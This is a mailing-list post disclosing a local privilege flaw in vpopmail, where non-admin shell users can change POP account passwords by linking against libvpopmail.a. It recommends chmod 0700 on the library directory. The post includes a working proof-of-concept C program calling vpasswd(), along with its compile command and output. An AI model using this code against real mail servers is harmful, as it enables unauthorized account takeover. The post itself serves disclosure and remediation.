[ Apologies if this has been previously covered ]
Maybe I'm a bit paranoid..
I know most people don't run shell/mail services on the same machine,
But if you did it is possible for non-admin accounts to change the password
of pop accounts.
The simple fix is to chmod 0700 ~vpopmail/lib, which will prevent linking
with the libvpopmail.a library.
--vpop_sec_test.c--
#include <stdio.h>
#include <sys/time.h>
#include <vpopmail.h>
#include <vauth.h>
extern int vpasswd( char *, char *, char *, int);
int main(void) {
if ( (vpasswd("user", "domain.net", "mynewpasswd", NULL) ) == 0 ){
printf("changed passwd\n");
}
}
--vpop_sec_test.c--
$gcc -o test vpop_sec_test.o /home/vpopmail/lib/libvpopmail.a -L/usr/local/mysql/lib
-lmysqlclient -lsocket -lnsl -lm
$./test
changed passwd
$
--
--
-------------------------
Sean P. Scanlon
[EMAIL PROTECTED]
-------------------------
"Personally, I think hashes are gods greatest gift to the programmer. I
love them. If I could turn my wife into one, I would. "
-seen in 'comp.lang.perl.misc'
